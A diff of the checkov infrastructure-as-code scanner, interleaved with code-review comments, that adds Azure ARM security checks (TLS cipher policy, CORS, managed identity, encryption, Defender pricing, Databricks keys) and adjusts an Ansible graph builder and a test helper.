@@ -3,30 +3,34 @@ from typing import List, Dict, Any import yaml + current_dir = os.path.dirname(os.path.realpath(__file__)) def load_failed_checks_from_file(lang: str) -> Dict[str, List[Dict[str, Any]]]: - report_path = os.path.join(current_dir, '..', f'checkov_report_cdk_{lang}.json') + report_path = os.path.join(current_dir, '..', 'checkov_report_cdk.json') with open(report_path) as f: data = f.read() - report = json.loads(data) - assert report is not None - results = report.get("results", {}) - failed_checks = results.get("failed_checks") - skipped_checks = results.get("skipped_checks") - results = {} - for check in failed_checks: - check_id = check['check_id'] - if not results.get(check_id): - results[check_id] = [] - results[check_id].append(check) - for check in skipped_checks: - check_id = check['check_id'] - if not results.get(check_id): - results[check_id] = [] - results[check_id].append(check) - return results + reports = json.loads(data) + for report in reports: + if report.get('check_type') == f'cdk_{lang}': + assert report is not None + results = report.get("results", {}) + failed_checks = results.get("failed_checks") + skipped_checks = results.get("skipped_checks") + results = {} + for check in failed_checks: + check_id = check['check_id'] + if not results.get(check_id): + results[check_id] = [] + results[check_id].append(check) + for check in skipped_checks: + check_id = check['check_id'] + if not results.get(check_id): + results[check_id] = [] + results[check_id].append(check) + return results + return {} def is_policy_with_correct_check_id(check_id: str, language: str, policy_name: str) -> bool: diff --git a/checkov/ansible/graph_builder/local_graph.py b/checkov/ansible/graph_builder/local_graph.py index b9cb799c659..a94f9ca182d 100644 --- a/checkov/ansible/graph_builder/local_graph.py +++ b/checkov/ansible/graph_builder/local_graph.py 
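Review bot: `failed_checks = results.get("failed_checks")` and the `skipped_checks` line inside the new `for report in reports` loop still iterate the raw value, so a matching report that lacks one of those keys raises `TypeError` on `None` instead of being treated as empty. The two grouping loops are duplicated and `results` is reassigned from the report's results mapping to the accumulator, which makes the function hard to follow; `setdefault` over the concatenated lists removes both copies without a new import, and the `assert report is not None` is dead once `report.get` has already been called. The trailing `return {}` silently hides a report file with no `cdk_{lang}` entry, which then surfaces as unrelated failures in every test that uses the fixture; raising with a message naming the missing check_type is clearer (keep `return {}` only if an empty result is genuinely intended).
```python
    reports = json.loads(data)
    for report in reports:
        if report.get('check_type') != f'cdk_{lang}':
            continue
        report_results = report.get("results", {})
        checks = (report_results.get("failed_checks") or []) + (report_results.get("skipped_checks") or [])
        grouped: Dict[str, List[Dict[str, Any]]] = {}
        for check in checks:
            grouped.setdefault(check['check_id'], []).append(check)
        return grouped
    raise ValueError(f"no 'cdk_{lang}' report found in {report_path}")
```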
@@ -69,7 +69,7 @@ def _create_tasks_vertices(self, file_path: str, task: Any, prefix: str = "") -> # either it is actually not an Ansible file or a playbook without tasks refs continue - resource_type = f"{ResourceType.TASKS}.{name}" + resource_type = f"{ResourceType.TASKS}.{prefix}{name}" if isinstance(config, str): # this happens when modules have no parameters and are directly used with the user input @@ -94,11 +94,11 @@ def _create_tasks_vertices(self, file_path: str, task: Any, prefix: str = "") -> self.vertices.append( Block( name=f"{resource_type}.{task_name}", - config=config, + config=task, path=file_path, block_type=BlockType.RESOURCE, attributes=attributes, - id=f"{resource_type}.{prefix}{task_name}", + id=f"{resource_type}.{task_name}", source=self.source, ) ) diff --git a/checkov/ansible/runner.py b/checkov/ansible/runner.py index f6ade71e9bb..8c0bd86c7be 100644 --- a/checkov/ansible/runner.py +++ b/checkov/ansible/runner.py @@ -2,6 +2,8 @@ from typing import TYPE_CHECKING, Any +from checkov.common.graph.checks_infra.registry import BaseRegistry + from checkov.ansible.checks.registry import registry from checkov.ansible.graph_builder.graph_components.resource_types import ResourceType from checkov.ansible.graph_builder.local_graph import AnsibleLocalGraph @@ -27,6 +29,7 @@ def __init__( source: str = "Ansible", graph_class: type[ObjectLocalGraph] = AnsibleLocalGraph, graph_manager: ObjectGraphManager | None = None, + external_registries: list[BaseRegistry] | None = None, ) -> None: super().__init__( db_connector=db_connector, @@ -128,3 +131,6 @@ def build_definitions_context( definitions_raw: dict[str, list[tuple[int, str]]], ) -> dict[str, dict[str, Any]]: return build_definitions_context(definitions=definitions, definitions_raw=definitions_raw) + + def set_definitions_raw(self, definitions_raw: dict[str, list[tuple[int, str]]]) -> None: + self.definitions_raw = definitions_raw 
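Review bot: `resource_type = f"{ResourceType.TASKS}.{prefix}{name}"` in the first hunk changes the string that graph checks match through `resource_types`, and the second hunk (`id=f"{resource_type}.{task_name}"`) only moves the prefix rather than dropping it, so the vertex id keeps the same text while a YAML check written against the unprefixed `tasks.<module>` form would presumably stop matching when `prefix` is non-empty; confirm the existing Ansible graph checks and their tests exercise a non-empty prefix. `config=task` also widens what is stored on the Block from the module's parameters to the whole task mapping while `attributes` is still whatever was derived before the hunk, so the two can disagree; a comment such as `# store the whole task so graph checks can inspect keys that sit beside the module` would record the intent. `_create_tasks_vertices` starts and ends outside these hunks.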
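Review bot: `from checkov.common.graph.checks_infra.registry import BaseRegistry` is a runtime import used only in the `external_registries` annotation, and it is placed between the `typing` import and the `checkov.ansible` group with blank lines on both sides, which breaks the file's grouped import layout. The module already imports `TYPE_CHECKING`, and `graph_class: type[ObjectLocalGraph]` shows annotations are evaluated lazily, so the name can presumably live under the existing `if TYPE_CHECKING:` block instead, avoiding a runtime dependency on the graph registry package and any import cycle through it.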
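Review bot: `external_registries: list[BaseRegistry] | None = None` is added to the signature, but nothing in the visible lines forwards it, and the `super().__init__(` call that follows is cut off by the hunk, so whether it is used cannot be confirmed here. If it is accepted only so the Ansible runner matches a shared constructor signature, say so at the parameter: `external_registries: list[BaseRegistry] | None = None,  # accepted for runner-interface parity; not used by the Ansible runner`; otherwise pass it to `super().__init__` next to `graph_manager`. The new `set_definitions_raw` in the last hunk would also benefit from a one-line docstring stating that it replaces `self.definitions_raw` wholesale rather than merging into it.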
diff --git a/checkov/arm/checks/graph_checks/AzureMLWorkspacePublicNetwork.yaml b/checkov/arm/checks/graph_checks/AzureMLWorkspacePublicNetwork.yaml new file mode 100644 index 00000000000..cfaaf45376c --- /dev/null +++ b/checkov/arm/checks/graph_checks/AzureMLWorkspacePublicNetwork.yaml @@ -0,0 +1,15 @@ +metadata: + id: "CKV2_AZURE_49" + name: "Ensure that Azure Machine learning workspace is not configured with overly permissive network access" + category: "NETWORKING" +definition: + or: + - cond_type: "attribute" + resource_types: "Microsoft.MachineLearningServices/workspaces" + attribute: "properties.publicNetworkAccess" + operator: "not_exists" + - cond_type: "attribute" + resource_types: "Microsoft.MachineLearningServices/workspaces" + attribute: "properties.publicNetworkAccess" + operator: "equals" + value: "Disabled" \ No newline at end of file diff --git a/checkov/arm/checks/resource/AppGWDefinesSecureProtocols.py b/checkov/arm/checks/resource/AppGWDefinesSecureProtocols.py new file mode 100644 index 00000000000..a8003bb59d8 --- /dev/null +++ b/checkov/arm/checks/resource/AppGWDefinesSecureProtocols.py 
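Review bot: The `not_exists` branch passes a workspace that omits `properties.publicNetworkAccess`, but for Azure Machine Learning workspaces an unset value is, to my knowledge, treated as `Enabled` by the platform (the Terraform provider likewise defaults `public_network_access_enabled` to true), so the check would pass the very default it is meant to catch. Unless the ARM default is confirmed to be `Disabled`, drop the first `or` branch and keep only the `equals` / `Disabled` condition. The file also ends without a trailing newline (`\ No newline at end of file`), which the sibling YAML checks presumably have.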
@@ -0,0 +1,71 @@ +from __future__ import annotations +from typing import Any +from checkov.common.models.enums import CheckCategories, CheckResult +from checkov.arm.base_resource_check import BaseResourceCheck + +BAD_CIPHERS = { + "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384", + "TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256", + "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA", + "TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA", + "TLS_DHE_RSA_WITH_AES_256_GCM_SHA384", + "TLS_DHE_RSA_WITH_AES_128_GCM_SHA256", + "TLS_DHE_RSA_WITH_AES_256_CBC_SHA", + "TLS_DHE_RSA_WITH_AES_128_CBC_SHA", + "TLS_RSA_WITH_AES_256_GCM_SHA384", + "TLS_RSA_WITH_AES_128_GCM_SHA256", + "TLS_RSA_WITH_AES_256_CBC_SHA256", + "TLS_RSA_WITH_AES_128_CBC_SHA256", + "TLS_RSA_WITH_AES_256_CBC_SHA", + "TLS_RSA_WITH_AES_128_CBC_SHA", + "TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384 ", + "TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256", + "TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA", + "TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA", + "TLS_DHE_DSS_WITH_AES_256_CBC_SHA256", + "TLS_DHE_DSS_WITH_AES_128_CBC_SHA256 ", + "TLS_DHE_DSS_WITH_AES_256_CBC_SHA", + "TLS_DHE_DSS_WITH_AES_128_CBC_SHA", + "TLS_RSA_WITH_3DES_EDE_CBC_SHA", + "TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA", +} +PROTOCOL_VERSIONS = {"TLSv1_2", "TLSv1_3"} + + +class AppGWDefinesSecureProtocols(BaseResourceCheck): + def __init__(self) -> None: + """ + https://azure.github.io/PSRule.Rules.Azure/en/rules/Azure.AppGw.SSLPolicy/ + """ + name = "Ensure Application Gateway defines secure protocols for in transit communication" + id = "CKV_AZURE_218" + supported_resources = ("Microsoft.Network/applicationGateways",) + categories = (CheckCategories.ENCRYPTION,) + super().__init__(name=name, + id=id, + categories=categories, + supported_resources=supported_resources,) + + def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult: + sslPolicy = conf["properties"].get("sslPolicy") + if sslPolicy and isinstance(sslPolicy, dict): + policyType = sslPolicy.get("policyType") + if policyType != "Predefined": + protocolversion 
= sslPolicy.get("minProtocolVersion") + if ( + protocolversion and isinstance(protocolversion, str) + and protocolversion in PROTOCOL_VERSIONS + ): + ciphers = sslPolicy.get("cipherSuites") + if ciphers and isinstance(ciphers, list) and any(cipher in BAD_CIPHERS for cipher in ciphers): + return CheckResult.FAILED + return CheckResult.PASSED + + policyName = sslPolicy.get("policyName") + if policyName == "AppGwSslPolicy20220101S": + return CheckResult.PASSED + return CheckResult.FAILED + return CheckResult.FAILED + + +check = AppGWDefinesSecureProtocols() diff --git a/checkov/arm/checks/resource/AppServiceDisallowCORS.py b/checkov/arm/checks/resource/AppServiceDisallowCORS.py new file mode 100644 index 00000000000..1a38ca3b287 --- /dev/null +++ b/checkov/arm/checks/resource/AppServiceDisallowCORS.py @@ -0,0 +1,28 @@ +from typing import Any, List + +from checkov.arm.base_resource_negative_value_check import BaseResourceNegativeValueCheck +from checkov.common.models.enums import CheckCategories, CheckResult + + +class AppServiceDisallowCORS(BaseResourceNegativeValueCheck): + def __init__(self) -> None: + name = "Ensure that CORS disallows every resource to access app services" + id = "CKV_AZURE_57" + supported_resources = ("Microsoft.Web/sites",) + categories = (CheckCategories.GENERAL_SECURITY,) + super().__init__( + name=name, + id=id, + categories=categories, + supported_resources=supported_resources, + missing_block_result=CheckResult.PASSED + ) + + def get_inspected_key(self) -> str: + return 'properties/siteConfig/cors/allowedOrigins' + + def get_forbidden_values(self) -> List[Any]: + return ['*'] + + +check = AppServiceDisallowCORS() diff --git a/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py b/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py index 7cce9eae3f5..415d32c6ac9 100644 --- a/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py +++ b/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py 
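Review bot: Two entries in `BAD_CIPHERS` carry a trailing space, `"TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384 "` and `"TLS_DHE_DSS_WITH_AES_128_CBC_SHA256 "`, so the exact `cipher in BAD_CIPHERS` lookup never matches them and a custom policy listing either CBC suite is reported as passing; strip the spaces. `conf["properties"].get("sslPolicy")` raises `KeyError` on a gateway resource without a `properties` block instead of returning a result, so use `conf.get("properties", {}).get("sslPolicy")` to fall through to the final `FAILED`. The locals `sslPolicy`, `policyType` and `protocolversion` are camelCase against the file's otherwise PEP 8 naming; `ssl_policy`, `policy_type`, `min_protocol_version` read better. A comment above `PROTOCOL_VERSIONS` that a custom policy passes only when `minProtocolVersion` is one of these and no listed suite is in `BAD_CIPHERS` would document the whole decision rule of `scan_resource_conf`.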
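Review bot: `get_forbidden_values` returns `['*']` while `properties/siteConfig/cors/allowedOrigins` is a list in ARM, so the outcome depends on whether `BaseResourceNegativeValueCheck` tests list-valued keys element-wise; if it compares the whole value, `["*"]` never equals `'*'` and the check can never fail. Confirm that against the base class (outside this diff) and add a unit case with `allowedOrigins: ["*"]` expected to fail. A short docstring on `__init__` noting that `missing_block_result=CheckResult.PASSED` is deliberate because an absent `cors` block grants no cross-origin access would stop a later reader from changing it to `UNKNOWN` like the version checks in this series.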
@@ -14,7 +14,7 @@ def get_inspected_key(self) -> str: return "properties/netFrameworkVersion" def get_expected_value(self) -> str: - return "v7.0" + return "v8.0" check = AppServiceDotnetFrameworkVersion() diff --git a/checkov/arm/checks/resource/AppServiceIdentityProviderEnabled.py b/checkov/arm/checks/resource/AppServiceIdentityProviderEnabled.py new file mode 100644 index 00000000000..ce0540ad8f7 --- /dev/null +++ b/checkov/arm/checks/resource/AppServiceIdentityProviderEnabled.py @@ -0,0 +1,22 @@ +from typing import Any +from checkov.common.models.consts import ANY_VALUE +from checkov.common.models.enums import CheckCategories +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class AppServiceIdentityProviderEnabled(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure that Managed identity provider is enabled for web apps" + id = "CKV_AZURE_71" + supported_resources = ('Microsoft.Web/sites',) + categories = (CheckCategories.GENERAL_SECURITY,) + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self) -> str: + return "identity/type" + + def get_expected_value(self) -> Any: + return ANY_VALUE + + +check = AppServiceIdentityProviderEnabled() diff --git a/checkov/arm/checks/resource/AppServiceJavaVersion.py b/checkov/arm/checks/resource/AppServiceJavaVersion.py new file mode 100644 index 00000000000..759c6fa197b --- /dev/null +++ b/checkov/arm/checks/resource/AppServiceJavaVersion.py 
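Review bot: `get_expected_value` returning `ANY_VALUE` for `identity/type` passes a site whose identity block is explicitly `type: "None"`, a valid ARM value that disables managed identity, so the check only detects a missing block. Prefer `get_expected_values` (the same base class supports it in `AppServicePythonVersion` of this series) returning the identity kinds, e.g. `return ["SystemAssigned", "UserAssigned", "SystemAssigned, UserAssigned"]`, and note in a comment that templates also spell the combined form without the space if the base compares strings exactly. `missing_block_result` is left to the base default here while the neighbouring checks set it explicitly; a missing `identity` block should fail this check, so either pass the value or add a comment confirming the default does that.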
@@ -0,0 +1,22 @@ +from typing import Any +from checkov.common.models.enums import CheckResult, CheckCategories +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class AppServiceJavaVersion(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure that 'Java version' is the latest, if used to run the web app" + id = "CKV_AZURE_83" + supported_resources = ('Microsoft.Web/sites',) + categories = (CheckCategories.GENERAL_SECURITY,) + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources, + missing_block_result=CheckResult.UNKNOWN) + + def get_inspected_key(self) -> str: + return "siteConfig/javaVersion" + + def get_expected_value(self) -> Any: + return '17' + + +check = AppServiceJavaVersion() diff --git a/checkov/arm/checks/resource/AppServicePythonVersion.py b/checkov/arm/checks/resource/AppServicePythonVersion.py new file mode 100644 index 00000000000..33d62206b09 --- /dev/null +++ b/checkov/arm/checks/resource/AppServicePythonVersion.py @@ -0,0 +1,28 @@ +from typing import List, Any + +from checkov.arm.base_resource_value_check import BaseResourceValueCheck +from checkov.common.models.enums import CheckCategories, CheckResult + + +class AppServicePythonVersion(BaseResourceValueCheck): + + def __init__(self) -> None: + name = "Ensure that 'Python version' is the latest, if used to run the web app" + id = "CKV_AZURE_82" + supported_resources = ("Microsoft.Web/sites",) + categories = (CheckCategories.GENERAL_SECURITY,) + super().__init__( + name=name, + id=id, + categories=categories, + supported_resources=supported_resources, + missing_block_result=CheckResult.UNKNOWN) + + def get_inspected_key(self) -> str: + return "properties/siteConfig/pythonVersion" + + def get_expected_values(self) -> List[Any]: + return ["3.9", "3.10", "3.11", "3.12"] + + +check = AppServicePythonVersion() 
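Review bot: `get_inspected_key` returns `siteConfig/javaVersion` without the `properties/` prefix that every sibling `Microsoft.Web/sites` check in this commit uses (`properties/siteConfig/pythonVersion` in the next hunk, `properties/siteConfig/remoteDebuggingEnabled`, …), so on a real ARM template the key is never found and, because `missing_block_result=CheckResult.UNKNOWN`, the check silently never grades anything. Change it to `return "properties/siteConfig/javaVersion"`. Consider also whether a single expected value `'17'` is robust when templates may write the version as `17` or `17.0`; a `get_expected_values` list like the Python check's would cover that.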
diff --git a/checkov/arm/checks/resource/AppServiceRemoteDebuggingNotEnabled.py b/checkov/arm/checks/resource/AppServiceRemoteDebuggingNotEnabled.py new file mode 100644 index 00000000000..43347201879 --- /dev/null +++ b/checkov/arm/checks/resource/AppServiceRemoteDebuggingNotEnabled.py @@ -0,0 +1,21 @@ +from checkov.common.models.enums import CheckCategories, CheckResult +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class AppServiceRemoteDebuggingNotEnabled(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure that remote debugging is not enabled for app services" + id = "CKV_AZURE_72" + supported_resources = ["Microsoft.Web/sites",] + categories = [CheckCategories.GENERAL_SECURITY,] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources, + missing_block_result=CheckResult.PASSED,) + + def get_inspected_key(self) -> str: + return "properties/siteConfig/remoteDebuggingEnabled" + + def get_expected_value(self) -> bool: + return False + + +check = AppServiceRemoteDebuggingNotEnabled() diff --git a/checkov/arm/checks/resource/AutomationEncrypted.py b/checkov/arm/checks/resource/AutomationEncrypted.py new file mode 100644 index 00000000000..fab47e55e58 --- /dev/null +++ b/checkov/arm/checks/resource/AutomationEncrypted.py 
@@ -0,0 +1,20 @@
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+from checkov.common.models.enums import CheckCategories
+
+
+class AutomationEncrypted(BaseResourceValueCheck):
+ def __init__(self) -> None:
+ name = "Ensure that Automation account variables are encrypted"
+ id = "CKV_AZURE_73"
+ supported_resources = ("Microsoft.Automation/automationAccounts/variables",)
+ categories = (CheckCategories.ENCRYPTION,)
+ super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+ def get_inspected_key(self) -> str:
+ return "properties/isEncrypted"
+
+ def get_expected_value(self) -> bool:
+ return True
+
+
+check = AutomationEncrypted()
diff --git a/checkov/arm/checks/resource/AzureBatchAccountUsesKeyVaultEncryption.py b/checkov/arm/checks/resource/AzureBatchAccountUsesKeyVaultEncryption.py
new file mode 100644
index 00000000000..c29e9797da5
--- /dev/null
+++ b/checkov/arm/checks/resource/AzureBatchAccountUsesKeyVaultEncryption.py
@@ -0,0 +1,22 @@
+from checkov.common.models.consts import ANY_VALUE
+from typing import Any
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class AzureBatchAccountUsesKeyVaultEncryption(BaseResourceValueCheck):
+ def __init__(self) -> None:
+ name = "Ensure that Azure Batch account uses key vault to encrypt data"
+ id = "CKV_AZURE_76"
+ supported_resources = ("Microsoft.Batch/batchAccounts",)
+ categories = [CheckCategories.ENCRYPTION]
+ super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,)
+
+ def get_inspected_key(self) -> str:
+ return "properties/keyVaultReference"
+
+ def get_expected_value(self) -> Any:
+ return ANY_VALUE
+
+
+check = AzureBatchAccountUsesKeyVaultEncryption()
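Review bot: `properties/keyVaultReference` with `ANY_VALUE` passes whenever the account references a Key Vault, but as I read the `Microsoft.Batch/batchAccounts` schema that property is the vault used for `UserSubscription` pool allocation, while encryption of account data with a customer key lives under `properties/encryption/keySource` (`Microsoft.KeyVault`) and `keyVaultProperties`. If the intent is the name's "uses key vault to encrypt data", the key should be `properties/encryption/keySource` with expected value `Microsoft.KeyVault`; if the intent is parity with a Terraform `key_vault_reference` check, say so in a comment such as `# presence of a key vault reference, not the encryption keySource`. Please confirm which was meant.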
diff --git a/checkov/arm/checks/resource/AzureDefenderOnStorage.py b/checkov/arm/checks/resource/AzureDefenderOnStorage.py new file mode 100644 index 00000000000..ebc2f4ba81a --- /dev/null +++ b/checkov/arm/checks/resource/AzureDefenderOnStorage.py @@ -0,0 +1,27 @@ +from typing import Any, Dict, List +from checkov.common.models.enums import CheckCategories, CheckResult +from checkov.arm.base_resource_check import BaseResourceCheck + + +class AzureDefenderOnStorage(BaseResourceCheck): + def __init__(self) -> None: + name = "Ensure that Azure Defender is set to On for Storage" + id = "CKV_AZURE_84" + supported_resources = ("Microsoft.Security/pricings",) + categories = (CheckCategories.GENERAL_SECURITY,) + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def scan_resource_conf(self, conf: Dict[str, Any]) -> CheckResult: + properties: Dict[str, Any] = conf.get("properties", {}) + pricingTier = properties.get("pricingTier", "") + return ( + CheckResult.PASSED + if pricingTier == "Standard" + else CheckResult.FAILED + ) + + def get_evaluated_keys(self) -> List[str]: + return ["properties/pricingTier"] + + +check = AzureDefenderOnStorage() diff --git a/checkov/arm/checks/resource/AzureMLWorkspacePrivateEndpoint.py b/checkov/arm/checks/resource/AzureMLWorkspacePrivateEndpoint.py new file mode 100644 index 00000000000..221c990d5e6 --- /dev/null +++ b/checkov/arm/checks/resource/AzureMLWorkspacePrivateEndpoint.py 
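Review bot: `scan_resource_conf` grades every `Microsoft.Security/pricings` resource on `pricingTier == "Standard"` without looking at which Defender plan the resource is, so a `Free` tier for VirtualMachines, SqlServers or any other plan is reported as "Azure Defender is not on for Storage", and a Standard tier on an unrelated plan passes it. Gate on the plan name first, e.g. `if not str(conf.get("name", "")).endswith("StorageAccounts"): return CheckResult.UNKNOWN` (the name may be bare `StorageAccounts` or qualified with the parent, hence `endswith`; please confirm how the ARM parser stores `name`). `properties` is annotated as a dict but fetched via `conf.get("properties", {})` with no `isinstance` guard, so a non-object value raises instead of failing the check.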
@@ -0,0 +1,33 @@ +from typing import Dict, Any + +from checkov.common.models.enums import CheckCategories, CheckResult +from checkov.arm.base_resource_check import BaseResourceCheck +from checkov.common.util.consts import START_LINE, END_LINE + + +class AzureMLWorkspacePrivateEndpoint(BaseResourceCheck): + def __init__(self) -> None: + name = "Ensure Azure Machine learning workspace is not configured with private endpoint" + id = "CKV_AZURE_239" + supported_resources = ["Microsoft.MachineLearningServices/workspaces"] + categories = [CheckCategories.NETWORKING] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def scan_resource_conf(self, conf: Dict[str, Any]) -> CheckResult: + properties = conf.get("properties") + if isinstance(properties, dict): + managed_network = properties.get("managedNetwork") + if isinstance(managed_network, dict): + ob_rules = managed_network.get("outboundRules") + if isinstance(ob_rules, dict): + # check no outbound rule has private endpoint type + for key, rule in ob_rules.items(): + if key in [START_LINE, END_LINE]: + # Skip inner fields we add + continue + if rule.get("type") == "PrivateEndpoint": + return CheckResult.FAILED + return CheckResult.PASSED + + +check = AzureMLWorkspacePrivateEndpoint() diff --git a/checkov/arm/checks/resource/CognitiveServicesConfigureIdentity.py b/checkov/arm/checks/resource/CognitiveServicesConfigureIdentity.py new file mode 100644 index 00000000000..f81ccf0a89f --- /dev/null +++ b/checkov/arm/checks/resource/CognitiveServicesConfigureIdentity.py 
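Review bot: `rule.get("type")` assumes every value in `outboundRules` is a dict, but the loop already has to skip the `START_LINE`/`END_LINE` ints the parser injects, and any other non-dict value (a string rule, a list) raises `AttributeError` and aborts the scan; replace the special-case skip with `if not isinstance(rule, dict): continue`, which covers both. The name "is not configured with private endpoint" also reads counter-intuitively for a security control, since private-endpoint outbound rules are what keep managed-VNet traffic off the public internet; I cannot tell the intent from this file, so a comment explaining why a `PrivateEndpoint` outbound rule is the failing state (or a corrected name) would help.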
@@ -0,0 +1,22 @@ +from typing import Any +from checkov.common.models.consts import ANY_VALUE +from checkov.common.models.enums import CheckCategories +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class CognitiveServicesConfigureIdentity(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure that Cognitive Services account is not configured with managed identity" + id = "CKV_AZURE_238" + supported_resources = ('Microsoft.CognitiveServices/accounts',) + categories = (CheckCategories.GENERAL_SECURITY,) + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self) -> str: + return "identity/type" + + def get_expected_value(self) -> Any: + return ANY_VALUE + + +check = CognitiveServicesConfigureIdentity() diff --git a/checkov/arm/checks/resource/CognitiveServicesEnableLocalAuth.py b/checkov/arm/checks/resource/CognitiveServicesEnableLocalAuth.py new file mode 100644 index 00000000000..3ea82d18af6 --- /dev/null +++ b/checkov/arm/checks/resource/CognitiveServicesEnableLocalAuth.py @@ -0,0 +1,27 @@ +from typing import Any + +from checkov.common.models.enums import CheckCategories +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class CognitiveServicesEnableLocalAuth(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure that Cognitive Services accounts enable local authentication" + id = "CKV_AZURE_236" + supported_resources = ('Microsoft.CognitiveServices/accounts', ) + categories = (CheckCategories.NETWORKING, ) + super().__init__( + name=name, + id=id, + categories=categories, + supported_resources=supported_resources, + ) + + def get_inspected_key(self) -> str: + return 'properties/disableLocalAuth' + + def get_expected_value(self) -> Any: + return True + + +check = CognitiveServicesEnableLocalAuth() 
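Review bot: the name says the account "is not configured with managed identity" but the logic is the opposite: `identity/type` must be present (`ANY_VALUE`) to pass, and its absence is the failing state, so either the name or the logic is wrong. If the intent is to require an identity, rename to `name = "Ensure that Cognitive Services accounts are configured with managed identity"`. As with the web-app identity check, `ANY_VALUE` also accepts an explicit `"type": "None"`, so an allow-list of `SystemAssigned`/`UserAssigned` values would be stricter.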
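Review bot: the inspected key is `properties/disableLocalAuth` with expected value `True`, so the check passes only when local (key-based) authentication is disabled, yet the name reads "Ensure that Cognitive Services accounts enable local authentication" — the exact inverse. Rename to `name = "Ensure that Cognitive Services accounts disable local authentication"`. `CheckCategories.NETWORKING` is also a poor fit for an authentication control; an identity/access category would be more accurate if the enum has one. A template that omits `disableLocalAuth` fails (no `missing_block_result`), which is the safe reading if the property defaults to false when omitted, as I understand the schema; a comment saying so would help.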
diff --git a/checkov/arm/checks/resource/DataExplorerUsesDiskEncryption.py b/checkov/arm/checks/resource/DataExplorerUsesDiskEncryption.py
new file mode 100644
index 00000000000..785063e4b29
--- /dev/null
+++ b/checkov/arm/checks/resource/DataExplorerUsesDiskEncryption.py
@@ -0,0 +1,20 @@
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class DataExplorerUsesDiskEncryption(BaseResourceValueCheck):
+ def __init__(self) -> None:
+ name = "Ensure that Azure Data Explorer (Kusto) uses disk encryption"
+ id = "CKV_AZURE_74"
+ supported_resources = ("Microsoft.Kusto/clusters",)
+ categories = [CheckCategories.ENCRYPTION,]
+ super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,)
+
+ def get_inspected_key(self) -> str:
+ return "properties/enableDiskEncryption"
+
+ def get_expected_value(self) -> bool:
+ return True
+
+
+check = DataExplorerUsesDiskEncryption()
diff --git a/checkov/arm/checks/resource/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py b/checkov/arm/checks/resource/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py
new file mode 100644
index 00000000000..ee16ea9731f
--- /dev/null
+++ b/checkov/arm/checks/resource/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py
@@ -0,0 +1,32 @@ +from __future__ import annotations + +from typing import Any + +from checkov.common.models.enums import CheckResult, CheckCategories +from checkov.arm.base_resource_check import BaseResourceCheck +from checkov.common.util.data_structures_utils import find_in_dict + + +class DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey(BaseResourceCheck): + def __init__(self) -> None: + # https://learn.microsoft.com/en-us/azure/templates/microsoft.databricks/workspaces?pivots=deployment-language-arm-template#workspaceencryptionparameter-1 + name = "Ensure that Databricks Workspaces enables customer-managed key for root DBFS encryption" + id = "CKV2_AZURE_48" + supported_resources = ("Microsoft.Databricks/workspaces",) + categories = (CheckCategories.ENCRYPTION,) + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult: + parameters = conf.get("properties", {}).get("parameters") + prepare_encryption = find_in_dict(input_dict=parameters, key_path="prepareEncryption/value") + if not prepare_encryption or str(prepare_encryption).lower() != "true": + return CheckResult.FAILED + + encryption_settings = find_in_dict(input_dict=parameters, key_path="encryption/value") + if not encryption_settings: + return CheckResult.FAILED + + return CheckResult.PASSED + + +check = DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey() diff --git a/checkov/arm/checks/resource/DatabricksWorkspaceIsNotPublic.py b/checkov/arm/checks/resource/DatabricksWorkspaceIsNotPublic.py new file mode 100644 index 00000000000..aaae17689c8 --- /dev/null +++ b/checkov/arm/checks/resource/DatabricksWorkspaceIsNotPublic.py 
